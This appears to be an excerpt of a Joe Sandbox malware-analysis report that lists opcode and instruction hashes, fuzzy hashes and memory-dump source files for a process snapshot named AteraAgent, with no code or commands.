                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b5f1f83b14a46c26eee02784f8f01f3fcf149225926559b96583f50914c9c884
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55f07d1e26465ccac36167cdb79ad980da212d3f62b005e3b78a05dee586e8aa
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2001F765A0EBCD5FE7569B6888A52E87FB0EF0A301F0601E7D458CA0B7D9242949C701
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c2c764921cd09042ca9bf9234b26401efa35b57dd1d2921c0a82b1a232a8fc3f
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: f375361fa53ad9d7fb5a1c104ab99afaad50640e3aa4f77cdf4c7eed34db6144
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c2c764921cd09042ca9bf9234b26401efa35b57dd1d2921c0a82b1a232a8fc3f
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41F0243270ED0D4FEB58954CB8A267837C2EB96330701017AE1AACB1B2DC22B8038245
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 70a9151b85574f5e7168805eb55ea66e9796bab83259a197a6c7cc75375cba0b
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 90815cee9f3db4837130073a36565b6b0d9b40e6ac01696af9c9fbb8b7605fcc
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70a9151b85574f5e7168805eb55ea66e9796bab83259a197a6c7cc75375cba0b
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2F0FC7394DBCD1FEB71866884613E57BA1EF52210F0501FAE05CDA193ED282A45C781
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4d0a3f6e1ab5a6a5b88147ed3a0e6a4b67b58560cb3a9c1a8f3138196e9878aa
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 14731e84295e3b758d9f11a1c1d4707ada7e2aa3d770581e20ca243a93c4b15b
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d0a3f6e1ab5a6a5b88147ed3a0e6a4b67b58560cb3a9c1a8f3138196e9878aa
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2F0F42160EACE0FE32A977884646A47BE1AF45310B0E01F6C489CF2A3DA1DB9898741
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9508e216ff2ad5c25dc178143839cf2c6d68fc91d4fc59e08e1df5c7049ebea9
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3808a411adcc3a90d1f1df03e107f754125ffb69fb3dbf02cb7eea83b647871f
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9508e216ff2ad5c25dc178143839cf2c6d68fc91d4fc59e08e1df5c7049ebea9
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A01D63190A68D8FEB55EF14C8652E97BA1FF56300F02047DE41CC7596CB75E950CB40
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ba34932ceb3573064d11704c74b324da6d9778af16f6ee0d86176f0201433d44
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 80150dbefe8814335071c86ea2fc4b968f8c330cc60f3407c1564347c5a77d18
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba34932ceb3573064d11704c74b324da6d9778af16f6ee0d86176f0201433d44
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF0CD4090E3C90FE75A9778486A261BFE1AF97200B4D82EBC0C8CF0A3C92CA5498312
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f3bda1ca0c98891ba2a850359c566b53c1a94ba5f1f5ea33e508b94c0d11c94e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7076a2918ad42ed8efdfcbdbcabc81abe574eb10049f3e202e40fa8c2b8700c4
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3bda1ca0c98891ba2a850359c566b53c1a94ba5f1f5ea33e508b94c0d11c94e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DE0DF33B0990C4F9B98899C389A1FA73E2E398125B10033FE14EC2211C92298068380
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9d63b20a9ead0055ad73607a804eb3c5e7ecc9c8832b4dd8bd8d0770c37ab253
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a5e256eea49238c52dd6349fafc04909a3d8d7cb4cc109c3272575ea714e1b65
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d63b20a9ead0055ad73607a804eb3c5e7ecc9c8832b4dd8bd8d0770c37ab253
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5F05475B1964D9BEB88E7988895DAC73B2FFD8B50F454034E098D72A2DE2978018711
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
Memory Dump Source
• Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false